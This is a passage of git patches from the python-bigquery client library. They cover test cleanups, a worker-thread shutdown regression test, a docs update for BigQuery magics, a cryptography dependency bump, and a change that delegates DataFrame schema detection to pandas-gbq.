# diff --git a/samples/tests/test_download_public_data.py b/samples/tests/test_download_public_data.py index 02c2c6f9c..4f6c02452 100644 --- a/samples/tests/test_download_public_data.py +++ b/samples/tests/test_download_public_data.py @@ -12,8 +12,6 @@ # See the License for the specific language governing permissions and # limitations under the License. -import logging - import pytest from .. import download_public_data @@ -21,20 +19,9 @@ pytest.importorskip("google.cloud.bigquery_storage_v1") -def test_download_public_data( - caplog: pytest.LogCaptureFixture, capsys: pytest.CaptureFixture[str] -) -> None: - # Enable debug-level logging to verify the BigQuery Storage API is used. - caplog.set_level(logging.DEBUG) - +def test_download_public_data(capsys: pytest.CaptureFixture[str]) -> None: download_public_data.download_public_data() out, _ = capsys.readouterr() assert "year" in out assert "gender" in out assert "name" in out - - assert any( - "Started reading table 'bigquery-public-data.usa_names.usa_1910_current' with BQ Storage API session" - in message - for message in caplog.messages - ) diff --git a/samples/tests/test_download_public_data_sandbox.py b/samples/tests/test_download_public_data_sandbox.py index e86f604ad..d3dd31a38 100644 --- a/samples/tests/test_download_public_data_sandbox.py +++ b/samples/tests/test_download_public_data_sandbox.py @@ -12,8 +12,6 @@ # See the License for the specific language governing permissions and # limitations under the License. -import logging - import pytest from .. import download_public_data_sandbox @@ -21,20 +19,9 @@ pytest.importorskip("google.cloud.bigquery_storage_v1") -def test_download_public_data_sandbox( - caplog: pytest.LogCaptureFixture, capsys: pytest.CaptureFixture[str] -) -> None: - # Enable debug-level logging to verify the BigQuery Storage API is used. 
- caplog.set_level(logging.DEBUG) - +def test_download_public_data_sandbox(capsys: pytest.CaptureFixture[str]) -> None: download_public_data_sandbox.download_public_data_sandbox() - out, err = capsys.readouterr() + out, _ = capsys.readouterr() assert "year" in out assert "gender" in out assert "name" in out - - assert any( - # An anonymous table is used because this sample reads from query results. - ("Started reading table" in message and "BQ Storage API session" in message) - for message in caplog.messages - ) diff --git a/tests/unit/test__pandas_helpers.py b/tests/unit/test__pandas_helpers.py index 3a5fddacc..edfaadf69 100644 --- a/tests/unit/test__pandas_helpers.py +++ b/tests/unit/test__pandas_helpers.py @@ -16,6 +16,7 @@ import datetime import decimal import functools +import gc import operator import queue from typing import Union @@ -1846,6 +1847,98 @@ def fake_download_stream( assert queue_used.maxsize == expected_maxsize +@pytest.mark.skipif(isinstance(pyarrow, mock.Mock), reason="Requires `pyarrow`") +def test__download_table_bqstorage_shuts_down_workers( + monkeypatch, + module_under_test, +): + """Regression test for https://github.com/googleapis/python-bigquery/issues/2032 + + Make sure that when the top-level iterator goes out of scope (is deleted), + the child threads are also stopped. + """ + from google.cloud.bigquery import dataset + from google.cloud.bigquery import table + import google.cloud.bigquery_storage_v1.reader + import google.cloud.bigquery_storage_v1.types + + monkeypatch.setattr( + _versions_helpers.BQ_STORAGE_VERSIONS, "_installed_version", None + ) + monkeypatch.setattr(bigquery_storage, "__version__", "2.5.0") + + # Create a fake stream with a decent number of rows. 
+ arrow_schema = pyarrow.schema( + [ + ("int_col", pyarrow.int64()), + ("str_col", pyarrow.string()), + ] + ) + arrow_rows = pyarrow.record_batch( + [ + pyarrow.array([0, 1, 2], type=pyarrow.int64()), + pyarrow.array(["a", "b", "c"], type=pyarrow.string()), + ], + schema=arrow_schema, + ) + session = google.cloud.bigquery_storage_v1.types.ReadSession() + session.data_format = "ARROW" + session.arrow_schema = {"serialized_schema": arrow_schema.serialize().to_pybytes()} + session.streams = [ + google.cloud.bigquery_storage_v1.types.ReadStream(name=name) + for name in ("stream/s0", "stream/s1", "stream/s2") + ] + bqstorage_client = mock.create_autospec( + bigquery_storage.BigQueryReadClient, instance=True + ) + reader = mock.create_autospec( + google.cloud.bigquery_storage_v1.reader.ReadRowsStream, instance=True + ) + reader.__iter__.return_value = [ + google.cloud.bigquery_storage_v1.types.ReadRowsResponse( + arrow_schema={"serialized_schema": arrow_schema.serialize().to_pybytes()}, + arrow_record_batch={ + "serialized_record_batch": arrow_rows.serialize().to_pybytes() + }, + ) + for _ in range(100) + ] + reader.rows.return_value = google.cloud.bigquery_storage_v1.reader.ReadRowsIterable( + reader, read_session=session + ) + bqstorage_client.read_rows.return_value = reader + bqstorage_client.create_read_session.return_value = session + table_ref = table.TableReference( + dataset.DatasetReference("project-x", "dataset-y"), + "table-z", + ) + download_state = module_under_test._DownloadState() + assert download_state.started_workers == 0 + assert download_state.finished_workers == 0 + + result_gen = module_under_test._download_table_bqstorage( + "some-project", + table_ref, + bqstorage_client, + max_queue_size=1, + page_to_item=module_under_test._bqstorage_page_to_arrow, + download_state=download_state, + ) + + result_gen_iter = iter(result_gen) + next(result_gen_iter) + assert download_state.started_workers == 3 + assert download_state.finished_workers == 0 + + # Stop 
iteration early and simulate the variables going out of scope + # to be doubly sure that the worker threads are supposed to be cleaned up. + del result_gen, result_gen_iter + gc.collect() + + assert download_state.started_workers == 3 + assert download_state.finished_workers == 3 + + @pytest.mark.skipif(isinstance(pyarrow, mock.Mock), reason="Requires `pyarrow`") def test_download_arrow_row_iterator_unknown_field_type(module_under_test): fake_page = api_core.page_iterator.Page( From b5bcfb303d27015b747a3b0747ecd7f7ed0ed557 Mon Sep 17 00:00:00 2001 From: Alicia Williams Date: Fri, 14 Feb 2025 12:50:18 -0800 Subject: [PATCH 062/202] docs: update magics.rst (#2125) * Update magics.rst use bigquery-magics package for the %%bigquery magic * Update magics.rst add back space * update reference and link for bigquery magics --------- Co-authored-by: Lingqing Gan --- docs/magics.rst | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/docs/magics.rst b/docs/magics.rst index aa14c6bfa..549d67f76 100644 --- a/docs/magics.rst +++ b/docs/magics.rst @@ -6,7 +6,7 @@ in a Jupyter notebook cell. .. code:: - %load_ext google.cloud.bigquery + %load_ext bigquery_magics This makes the ``%%bigquery`` magic available. @@ -27,8 +27,9 @@ Running a parameterized query: :start-after: [START bigquery_jupyter_query_params_scalars] :end-before: [END bigquery_jupyter_query_params_scalars] -API Reference -------------- +BigQuery Magics Reference +------------------------- -.. automodule:: google.cloud.bigquery.magics.magics - :members: +- `BigQuery Magics Documentation`_ + +.. 
_BigQuery Magics Documentation: https://googleapis.dev/python/bigquery-magics/latest From b03a2afabde7f42be45f62fabd3dc0e6a9a493e1 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Fri, 14 Feb 2025 14:11:49 -0800 Subject: [PATCH 063/202] chore(deps): bump cryptography from 43.0.1 to 44.0.1 in /.kokoro (#2130) Bumps [cryptography](https://github.com/pyca/cryptography) from 43.0.1 to 44.0.1. - [Changelog](https://github.com/pyca/cryptography/blob/main/CHANGELOG.rst) - [Commits](https://github.com/pyca/cryptography/compare/43.0.1...44.0.1) --- updated-dependencies: - dependency-name: cryptography dependency-type: direct:production ... Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> Co-authored-by: Lingqing Gan --- .kokoro/requirements.txt | 60 +++++++++++++++++++++------------------- 1 file changed, 32 insertions(+), 28 deletions(-) diff --git a/.kokoro/requirements.txt b/.kokoro/requirements.txt index 16db448c1..6ad95a04a 100644 --- a/.kokoro/requirements.txt +++ b/.kokoro/requirements.txt @@ -112,34 +112,38 @@ colorlog==6.8.2 \ # via # gcp-docuploader # nox -cryptography==43.0.1 \ - --hash=sha256:014f58110f53237ace6a408b5beb6c427b64e084eb451ef25a28308270086494 \ - --hash=sha256:1bbcce1a551e262dfbafb6e6252f1ae36a248e615ca44ba302df077a846a8806 \ - --hash=sha256:203e92a75716d8cfb491dc47c79e17d0d9207ccffcbcb35f598fbe463ae3444d \ - --hash=sha256:27e613d7077ac613e399270253259d9d53872aaf657471473ebfc9a52935c062 \ - --hash=sha256:2bd51274dcd59f09dd952afb696bf9c61a7a49dfc764c04dd33ef7a6b502a1e2 \ - --hash=sha256:38926c50cff6f533f8a2dae3d7f19541432610d114a70808f0926d5aaa7121e4 \ - --hash=sha256:511f4273808ab590912a93ddb4e3914dfd8a388fed883361b02dea3791f292e1 \ - --hash=sha256:58d4e9129985185a06d849aa6df265bdd5a74ca6e1b736a77959b498e0505b85 \ - --hash=sha256:5b43d1ea6b378b54a1dc99dd8a2b5be47658fe9a7ce0a58ff0b55f4b43ef2b84 \ - 
--hash=sha256:61ec41068b7b74268fa86e3e9e12b9f0c21fcf65434571dbb13d954bceb08042 \ - --hash=sha256:666ae11966643886c2987b3b721899d250855718d6d9ce41b521252a17985f4d \ - --hash=sha256:68aaecc4178e90719e95298515979814bda0cbada1256a4485414860bd7ab962 \ - --hash=sha256:7c05650fe8023c5ed0d46793d4b7d7e6cd9c04e68eabe5b0aeea836e37bdcec2 \ - --hash=sha256:80eda8b3e173f0f247f711eef62be51b599b5d425c429b5d4ca6a05e9e856baa \ - --hash=sha256:8385d98f6a3bf8bb2d65a73e17ed87a3ba84f6991c155691c51112075f9ffc5d \ - --hash=sha256:88cce104c36870d70c49c7c8fd22885875d950d9ee6ab54df2745f83ba0dc365 \ - --hash=sha256:9d3cdb25fa98afdd3d0892d132b8d7139e2c087da1712041f6b762e4f807cc96 \ - --hash=sha256:a575913fb06e05e6b4b814d7f7468c2c660e8bb16d8d5a1faf9b33ccc569dd47 \ - --hash=sha256:ac119bb76b9faa00f48128b7f5679e1d8d437365c5d26f1c2c3f0da4ce1b553d \ - --hash=sha256:c1332724be35d23a854994ff0b66530119500b6053d0bd3363265f7e5e77288d \ - --hash=sha256:d03a475165f3134f773d1388aeb19c2d25ba88b6a9733c5c590b9ff7bbfa2e0c \ - --hash=sha256:d75601ad10b059ec832e78823b348bfa1a59f6b8d545db3a24fd44362a1564cb \ - --hash=sha256:de41fd81a41e53267cb020bb3a7212861da53a7d39f863585d13ea11049cf277 \ - --hash=sha256:e710bf40870f4db63c3d7d929aa9e09e4e7ee219e703f949ec4073b4294f6172 \ - --hash=sha256:ea25acb556320250756e53f9e20a4177515f012c9eaea17eb7587a8c4d8ae034 \ - --hash=sha256:f98bf604c82c416bc829e490c700ca1553eafdf2912a91e23a79d97d9801372a \ - --hash=sha256:fba1007b3ef89946dbbb515aeeb41e30203b004f0b4b00e5e16078b518563289 +cryptography==44.0.1 \ + --hash=sha256:00918d859aa4e57db8299607086f793fa7813ae2ff5a4637e318a25ef82730f7 \ + --hash=sha256:1e8d181e90a777b63f3f0caa836844a1182f1f265687fac2115fcf245f5fbec3 \ + --hash=sha256:1f9a92144fa0c877117e9748c74501bea842f93d21ee00b0cf922846d9d0b183 \ + --hash=sha256:21377472ca4ada2906bc313168c9dc7b1d7ca417b63c1c3011d0c74b7de9ae69 \ + --hash=sha256:24979e9f2040c953a94bf3c6782e67795a4c260734e5264dceea65c8f4bae64a \ + 
--hash=sha256:2a46a89ad3e6176223b632056f321bc7de36b9f9b93b2cc1cccf935a3849dc62 \ + --hash=sha256:322eb03ecc62784536bc173f1483e76747aafeb69c8728df48537eb431cd1911 \ + --hash=sha256:436df4f203482f41aad60ed1813811ac4ab102765ecae7a2bbb1dbb66dcff5a7 \ + --hash=sha256:4f422e8c6a28cf8b7f883eb790695d6d45b0c385a2583073f3cec434cc705e1a \ + --hash=sha256:53f23339864b617a3dfc2b0ac8d5c432625c80014c25caac9082314e9de56f41 \ + --hash=sha256:5fed5cd6102bb4eb843e3315d2bf25fede494509bddadb81e03a859c1bc17b83 \ + --hash=sha256:610a83540765a8d8ce0f351ce42e26e53e1f774a6efb71eb1b41eb01d01c3d12 \ + --hash=sha256:6c8acf6f3d1f47acb2248ec3ea261171a671f3d9428e34ad0357148d492c7864 \ + --hash=sha256:6f76fdd6fd048576a04c5210d53aa04ca34d2ed63336d4abd306d0cbe298fddf \ + --hash=sha256:72198e2b5925155497a5a3e8c216c7fb3e64c16ccee11f0e7da272fa93b35c4c \ + --hash=sha256:887143b9ff6bad2b7570da75a7fe8bbf5f65276365ac259a5d2d5147a73775f2 \ + --hash=sha256:888fcc3fce0c888785a4876ca55f9f43787f4c5c1cc1e2e0da71ad481ff82c5b \ + --hash=sha256:8e6a85a93d0642bd774460a86513c5d9d80b5c002ca9693e63f6e540f1815ed0 \ + --hash=sha256:94f99f2b943b354a5b6307d7e8d19f5c423a794462bde2bf310c770ba052b1c4 \ + --hash=sha256:9b336599e2cb77b1008cb2ac264b290803ec5e8e89d618a5e978ff5eb6f715d9 \ + --hash=sha256:a2d8a7045e1ab9b9f803f0d9531ead85f90c5f2859e653b61497228b18452008 \ + --hash=sha256:b8272f257cf1cbd3f2e120f14c68bff2b6bdfcc157fafdee84a1b795efd72862 \ + --hash=sha256:bf688f615c29bfe9dfc44312ca470989279f0e94bb9f631f85e3459af8efc009 \ + --hash=sha256:d9c5b9f698a83c8bd71e0f4d3f9f839ef244798e5ffe96febfa9714717db7af7 \ + --hash=sha256:dd7c7e2d71d908dc0f8d2027e1604102140d84b155e658c20e8ad1304317691f \ + --hash=sha256:df978682c1504fc93b3209de21aeabf2375cb1571d4e61907b3e7a2540e83026 \ + --hash=sha256:e403f7f766ded778ecdb790da786b418a9f2394f36e8cc8b796cc056ab05f44f \ + --hash=sha256:eb3889330f2a4a148abead555399ec9a32b13b7c8ba969b72d8e500eb7ef84cd \ + --hash=sha256:f4daefc971c2d1f82f03097dc6f216744a6cd2ac0f04c68fb935ea2ba2a0d420 \ + 
--hash=sha256:f51f5705ab27898afda1aaa430f34ad90dc117421057782022edf0600bec5f14 \ + --hash=sha256:fd0ee90072861e276b0ff08bd627abec29e32a53b2be44e41dbcdf87cbee2b00 # via # -r requirements.in # gcp-releasetool From 7603bd71d60592ef2a551d9eea09987b218edc73 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Tim=20Swe=C3=B1a=20=28Swast=29?= Date: Fri, 21 Feb 2025 11:44:59 -0600 Subject: [PATCH 064/202] deps: use pandas-gbq to determine schema in `load_table_from_dataframe` (#2095) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * feat: use pandas-gbq to determine schema in `load_table_from_dataframe` * 🦉 Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * fix some unit tests * 🦉 Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * 🦉 Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * bump minimum pandas-gbq to 0.26.1 * 🦉 Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * drop pandas-gbq from python 3.7 extras * relax warning message text assertion * use consistent time zone presence/absence in time datetime system test * Update google/cloud/bigquery/_pandas_helpers.py * Update google/cloud/bigquery/_pandas_helpers.py Co-authored-by: Chalmer Lowe * remove pandas-gbq from at least 1 unit test and system test session --------- Co-authored-by: Owl Bot Co-authored-by: Chalmer Lowe --- google/cloud/bigquery/_pandas_helpers.py | 35 +++++++++++- google/cloud/bigquery/_pyarrow_helpers.py | 7 ++- noxfile.py | 15 ++++++ pyproject.toml | 3 ++ testing/constraints-3.8.txt | 9 ++++ tests/system/test_pandas.py | 2 +- tests/unit/test__pandas_helpers.py | 65 +++++++++++++++++++---- tests/unit/test_client.py | 33 +++++++++--- 8 files changed,
147 insertions(+), 22 deletions(-) diff --git a/google/cloud/bigquery/_pandas_helpers.py b/google/cloud/bigquery/_pandas_helpers.py index 4f70f6c29..0017d92ce 100644 --- a/google/cloud/bigquery/_pandas_helpers.py +++ b/google/cloud/bigquery/_pandas_helpers.py @@ -12,7 +12,12 @@ # See the License for the specific language governing permissions and # limitations under the License. -"""Shared helper functions for connecting BigQuery and pandas.""" +"""Shared helper functions for connecting BigQuery and pandas. + +NOTE: This module is DEPRECATED. Please make updates in the pandas-gbq package, +instead. See: go/pandas-gbq-and-bigframes-redundancy and +https://github.com/googleapis/python-bigquery-pandas/blob/main/pandas_gbq/schema/pandas_to_bigquery.py +""" import concurrent.futures from datetime import datetime @@ -40,6 +45,16 @@ else: import numpy + +try: + import pandas_gbq.schema.pandas_to_bigquery # type: ignore + + pandas_gbq_import_exception = None +except ImportError as exc: + pandas_gbq = None + pandas_gbq_import_exception = exc + + try: import db_dtypes # type: ignore @@ -445,6 +460,10 @@ def _first_array_valid(series): def dataframe_to_bq_schema(dataframe, bq_schema): """Convert a pandas DataFrame schema to a BigQuery schema. + DEPRECATED: Use + pandas_gbq.schema.pandas_to_bigquery.dataframe_to_bigquery_fields(), + instead. See: go/pandas-gbq-and-bigframes-redundancy. + Args: dataframe (pandas.DataFrame): DataFrame for which the client determines the BigQuery schema. @@ -460,6 +479,20 @@ def dataframe_to_bq_schema(dataframe, bq_schema): The automatically determined schema. Returns None if the type of any column cannot be determined. """ + if pandas_gbq is None: + warnings.warn( + "Loading pandas DataFrame into BigQuery will require pandas-gbq " + "package version 0.26.1 or greater in the future. 
" + f"Tried to import pandas-gbq and got: {pandas_gbq_import_exception}", + category=FutureWarning, + ) + else: + return pandas_gbq.schema.pandas_to_bigquery.dataframe_to_bigquery_fields( + dataframe, + override_bigquery_fields=bq_schema, + index=True, + ) + if bq_schema: bq_schema = schema._to_schema_fields(bq_schema) bq_schema_index = {field.name: field for field in bq_schema} diff --git a/google/cloud/bigquery/_pyarrow_helpers.py b/google/cloud/bigquery/_pyarrow_helpers.py index 3c745a611..1b42cd5c7 100644 --- a/google/cloud/bigquery/_pyarrow_helpers.py +++ b/google/cloud/bigquery/_pyarrow_helpers.py @@ -12,7 +12,12 @@ # See the License for the specific language governing permissions and # limitations under the License. -"""Shared helper functions for connecting BigQuery and pyarrow.""" +"""Shared helper functions for connecting BigQuery and pyarrow. + +NOTE: This module is DEPRECATED. Please make updates in the pandas-gbq package, +instead. See: go/pandas-gbq-and-bigframes-redundancy and +https://github.com/googleapis/python-bigquery-pandas/blob/main/pandas_gbq/schema/pyarrow_to_bigquery.py +""" from typing import Any diff --git a/noxfile.py b/noxfile.py index e08956b11..87bd9a70c 100644 --- a/noxfile.py +++ b/noxfile.py @@ -110,6 +110,14 @@ def default(session, install_extras=True): else: install_target = "." session.install("-e", install_target, "-c", constraints_path) + + # Test with some broken "extras" in case the user didn't install the extra + # directly. For example, pandas-gbq is recommended for pandas features, but + # we want to test that we fallback to the previous behavior. For context, + # see internal document go/pandas-gbq-and-bigframes-redundancy. + if session.python == UNIT_TEST_PYTHON_VERSIONS[0]: + session.run("python", "-m", "pip", "uninstall", "pandas-gbq", "-y") + session.run("python", "-m", "pip", "freeze") # Run py.test against the unit tests. 
@@ -228,6 +236,13 @@ def system(session): extras = "[all]" session.install("-e", f".{extras}", "-c", constraints_path) + # Test with some broken "extras" in case the user didn't install the extra + # directly. For example, pandas-gbq is recommended for pandas features, but + # we want to test that we fallback to the previous behavior. For context, + # see internal document go/pandas-gbq-and-bigframes-redundancy. + if session.python == SYSTEM_TEST_PYTHON_VERSIONS[0]: + session.run("python", "-m", "pip", "uninstall", "pandas-gbq", "-y") + # print versions of all dependencies session.run("python", "-m", "pip", "freeze") diff --git a/pyproject.toml b/pyproject.toml index ecf21d922..c4e5c2f0d 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -74,6 +74,9 @@ bqstorage = [ ] pandas = [ "pandas >= 1.1.0", + "pandas-gbq >= 0.26.1; python_version >= '3.8'", + "grpcio >= 1.47.0, < 2.0dev", + "grpcio >= 1.49.1, < 2.0dev; python_version >= '3.11'", "pyarrow >= 3.0.0", "db-dtypes >= 0.3.0, < 2.0.0dev", "importlib_metadata >= 1.0.0; python_version < '3.8'", diff --git a/testing/constraints-3.8.txt b/testing/constraints-3.8.txt index e5e73c5c7..9883fb8cc 100644 --- a/testing/constraints-3.8.txt +++ b/testing/constraints-3.8.txt @@ -1,2 +1,11 @@ grpcio==1.47.0 pandas==1.2.0 + +# This constraints file is used to check that lower bounds +# are correct in setup.py +# +# Pin the version to the lower bound. 
+# +# e.g., if setup.py has "foo >= 1.14.0, < 2.0.0dev", +# Then this file should have foo==1.14.0 +pandas-gbq==0.26.1 diff --git a/tests/system/test_pandas.py b/tests/system/test_pandas.py index 85c7b79e6..a9e76d416 100644 --- a/tests/system/test_pandas.py +++ b/tests/system/test_pandas.py @@ -1259,7 +1259,7 @@ def test_upload_time_and_datetime_56(bigquery_client, dataset_id): df = pandas.DataFrame( dict( dt=[ - datetime.datetime(2020, 1, 8, 8, 0, 0), + datetime.datetime(2020, 1, 8, 8, 0, 0, tzinfo=datetime.timezone.utc), datetime.datetime( 2020, 1, diff --git a/tests/unit/test__pandas_helpers.py b/tests/unit/test__pandas_helpers.py index edfaadf69..fdd232a5c 100644 --- a/tests/unit/test__pandas_helpers.py +++ b/tests/unit/test__pandas_helpers.py @@ -35,6 +35,11 @@ except ImportError: pandas = None +try: + import pandas_gbq.schema.pandas_to_bigquery +except ImportError: + pandas_gbq = None + try: import geopandas except ImportError: @@ -1281,7 +1286,21 @@ def test_dataframe_to_parquet_compression_method(module_under_test): @pytest.mark.skipif(pandas is None, reason="Requires `pandas`") -def test_dataframe_to_bq_schema_w_named_index(module_under_test): +@pytest.mark.skipif(pandas_gbq is None, reason="Requires `pandas-gbq`") +def test_dataframe_to_bq_schema_returns_schema_with_pandas_gbq( + module_under_test, monkeypatch +): + monkeypatch.setattr(module_under_test, "pandas_gbq", None) + dataframe = pandas.DataFrame({"field00": ["foo", "bar"]}) + got = module_under_test.dataframe_to_bq_schema(dataframe, []) + # Don't assert beyond this, since pandas-gbq is now source of truth. 
+ assert got is not None + + +@pytest.mark.skipif(pandas is None, reason="Requires `pandas`") +def test_dataframe_to_bq_schema_w_named_index(module_under_test, monkeypatch): + monkeypatch.setattr(module_under_test, "pandas_gbq", None) + df_data = collections.OrderedDict( [ ("str_column", ["hello", "world"]), @@ -1292,7 +1311,8 @@ def test_dataframe_to_bq_schema_w_named_index(module_under_test): index = pandas.Index(["a", "b"], name="str_index") dataframe = pandas.DataFrame(df_data, index=index) - returned_schema = module_under_test.dataframe_to_bq_schema(dataframe, []) + with pytest.warns(FutureWarning, match="pandas-gbq"): + returned_schema = module_under_test.dataframe_to_bq_schema(dataframe, []) expected_schema = ( schema.SchemaField("str_index", "STRING", "NULLABLE"), @@ -1304,7 +1324,9 @@ def test_dataframe_to_bq_schema_w_named_index(module_under_test): @pytest.mark.skipif(pandas is None, reason="Requires `pandas`") -def test_dataframe_to_bq_schema_w_multiindex(module_under_test): +def test_dataframe_to_bq_schema_w_multiindex(module_under_test, monkeypatch): + monkeypatch.setattr(module_under_test, "pandas_gbq", None) + df_data = collections.OrderedDict( [ ("str_column", ["hello", "world"]), @@ -1321,7 +1343,8 @@ def test_dataframe_to_bq_schema_w_multiindex(module_under_test): ) dataframe = pandas.DataFrame(df_data, index=index) - returned_schema = module_under_test.dataframe_to_bq_schema(dataframe, []) + with pytest.warns(FutureWarning, match="pandas-gbq"): + returned_schema = module_under_test.dataframe_to_bq_schema(dataframe, []) expected_schema = ( schema.SchemaField("str_index", "STRING", "NULLABLE"), @@ -1335,7 +1358,9 @@ def test_dataframe_to_bq_schema_w_multiindex(module_under_test): @pytest.mark.skipif(pandas is None, reason="Requires `pandas`") -def test_dataframe_to_bq_schema_w_bq_schema(module_under_test): +def test_dataframe_to_bq_schema_w_bq_schema(module_under_test, monkeypatch): + monkeypatch.setattr(module_under_test, "pandas_gbq", None) + 
df_data = collections.OrderedDict( [ ("str_column", ["hello", "world"]), @@ -1350,7 +1375,10 @@ def test_dataframe_to_bq_schema_w_bq_schema(module_under_test): {"name": "bool_column", "type": "BOOL", "mode": "REQUIRED"}, ] - returned_schema = module_under_test.dataframe_to_bq_schema(dataframe, dict_schema) + with pytest.warns(FutureWarning, match="pandas-gbq"): + returned_schema = module_under_test.dataframe_to_bq_schema( + dataframe, dict_schema + ) expected_schema = ( schema.SchemaField("str_column", "STRING", "NULLABLE"), @@ -1361,7 +1389,11 @@ def test_dataframe_to_bq_schema_w_bq_schema(module_under_test): @pytest.mark.skipif(pandas is None, reason="Requires `pandas`") -def test_dataframe_to_bq_schema_fallback_needed_wo_pyarrow(module_under_test): +def test_dataframe_to_bq_schema_fallback_needed_wo_pyarrow( + module_under_test, monkeypatch +): + monkeypatch.setattr(module_under_test, "pandas_gbq", None) + dataframe = pandas.DataFrame( data=[ {"id": 10, "status": "FOO", "execution_date": datetime.date(2019, 5, 10)}, @@ -1389,7 +1421,11 @@ def test_dataframe_to_bq_schema_fallback_needed_wo_pyarrow(module_under_test): @pytest.mark.skipif(pandas is None, reason="Requires `pandas`") @pytest.mark.skipif(isinstance(pyarrow, mock.Mock), reason="Requires `pyarrow`") -def test_dataframe_to_bq_schema_fallback_needed_w_pyarrow(module_under_test): +def test_dataframe_to_bq_schema_fallback_needed_w_pyarrow( + module_under_test, monkeypatch +): + monkeypatch.setattr(module_under_test, "pandas_gbq", None) + dataframe = pandas.DataFrame( data=[ {"id": 10, "status": "FOO", "created_at": datetime.date(2019, 5, 10)}, @@ -1419,7 +1455,9 @@ def test_dataframe_to_bq_schema_fallback_needed_w_pyarrow(module_under_test): @pytest.mark.skipif(pandas is None, reason="Requires `pandas`") @pytest.mark.skipif(isinstance(pyarrow, mock.Mock), reason="Requires `pyarrow`") -def test_dataframe_to_bq_schema_pyarrow_fallback_fails(module_under_test): +def 
test_dataframe_to_bq_schema_pyarrow_fallback_fails(module_under_test, monkeypatch): + monkeypatch.setattr(module_under_test, "pandas_gbq", None) + dataframe = pandas.DataFrame( data=[ {"struct_field": {"one": 2}, "status": "FOO"}, @@ -1443,9 +1481,11 @@ def test_dataframe_to_bq_schema_pyarrow_fallback_fails(module_under_test): @pytest.mark.skipif(geopandas is None, reason="Requires `geopandas`") -def test_dataframe_to_bq_schema_geography(module_under_test): +def test_dataframe_to_bq_schema_geography(module_under_test, monkeypatch): from shapely import wkt + monkeypatch.setattr(module_under_test, "pandas_gbq", None) + df = geopandas.GeoDataFrame( pandas.DataFrame( dict( @@ -1456,7 +1496,10 @@ def test_dataframe_to_bq_schema_geography(module_under_test): ), geometry="geo1", ) - bq_schema = module_under_test.dataframe_to_bq_schema(df, []) + + with pytest.warns(FutureWarning, match="pandas-gbq"): + bq_schema = module_under_test.dataframe_to_bq_schema(df, []) + assert bq_schema == ( schema.SchemaField("name", "STRING"), schema.SchemaField("geo1", "GEOGRAPHY"), diff --git a/tests/unit/test_client.py b/tests/unit/test_client.py index 462a70bbe..a5af37b6b 100644 --- a/tests/unit/test_client.py +++ b/tests/unit/test_client.py @@ -8391,8 +8391,12 @@ def test_load_table_from_dataframe_w_automatic_schema_detection_fails(self): autospec=True, side_effect=google.api_core.exceptions.NotFound("Table not found"), ) + pandas_gbq_patch = mock.patch( + "google.cloud.bigquery._pandas_helpers.pandas_gbq", + new=None, + ) - with load_patch as load_table_from_file, get_table_patch: + with load_patch as load_table_from_file, get_table_patch, pandas_gbq_patch: with warnings.catch_warnings(record=True) as warned: client.load_table_from_dataframe( dataframe, self.TABLE_REF, location=self.LOCATION @@ -8448,7 +8452,6 @@ def test_load_table_from_dataframe_w_index_and_auto_schema(self): load_patch = mock.patch( "google.cloud.bigquery.client.Client.load_table_from_file", autospec=True ) - 
get_table_patch = mock.patch( "google.cloud.bigquery.client.Client.get_table", autospec=True, @@ -8460,6 +8463,7 @@ def test_load_table_from_dataframe_w_index_and_auto_schema(self): ] ), ) + with load_patch as load_table_from_file, get_table_patch: client.load_table_from_dataframe( dataframe, self.TABLE_REF, location=self.LOCATION @@ -8580,10 +8584,10 @@ def test_load_table_from_dataframe_w_nullable_int64_datatype_automatic_schema(se client = self._make_client() dataframe = pandas.DataFrame({"x": [1, 2, None, 4]}, dtype="Int64") + load_patch = mock.patch( "google.cloud.bigquery.client.Client.load_table_from_file", autospec=True ) - get_table_patch = mock.patch( "google.cloud.bigquery.client.Client.get_table", autospec=True, @@ -8612,8 +8616,11 @@ def test_load_table_from_dataframe_w_nullable_int64_datatype_automatic_schema(se sent_config = load_table_from_file.mock_calls[0][2]["job_config"] assert sent_config.source_format == job.SourceFormat.PARQUET - assert tuple(sent_config.schema) == ( - SchemaField("x", "INT64", "NULLABLE", None), + assert ( + # Accept either the GoogleSQL or legacy SQL type name from pandas-gbq. 
+ tuple(sent_config.schema) == (SchemaField("x", "INT64", "NULLABLE", None),) + or tuple(sent_config.schema) + == (SchemaField("x", "INTEGER", "NULLABLE", None),) ) def test_load_table_from_dataframe_struct_fields(self): @@ -8759,7 +8766,7 @@ def test_load_table_from_dataframe_array_fields_w_auto_schema(self): data=records, columns=["float_column", "array_column"] ) - expected_schema = [ + expected_schema_googlesql = [ SchemaField("float_column", "FLOAT"), SchemaField( "array_column", @@ -8767,6 +8774,14 @@ def test_load_table_from_dataframe_array_fields_w_auto_schema(self): mode="REPEATED", ), ] + expected_schema_legacy_sql = [ + SchemaField("float_column", "FLOAT"), + SchemaField( + "array_column", + "INTEGER", + mode="REPEATED", + ), + ] load_patch = mock.patch( "google.cloud.bigquery.client.Client.load_table_from_file", autospec=True @@ -8802,7 +8817,10 @@ def test_load_table_from_dataframe_array_fields_w_auto_schema(self): sent_config = load_table_from_file.mock_calls[0][2]["job_config"] assert sent_config.source_format == job.SourceFormat.PARQUET - assert sent_config.schema == expected_schema + assert ( + sent_config.schema == expected_schema_googlesql + or sent_config.schema == expected_schema_legacy_sql + ) def test_load_table_from_dataframe_w_partial_schema(self): pandas = pytest.importorskip("pandas") @@ -8922,7 +8940,6 @@ def test_load_table_from_dataframe_w_partial_schema_extra_types(self): load_table_from_file.assert_not_called() message = str(exc_context.value) - assert "bq_schema contains fields not present in dataframe" in message assert "unknown_col" in message def test_load_table_from_dataframe_w_schema_arrow_custom_compression(self): From 2c1968115bef8e1dc84e0125615f551b9b011a4b Mon Sep 17 00:00:00 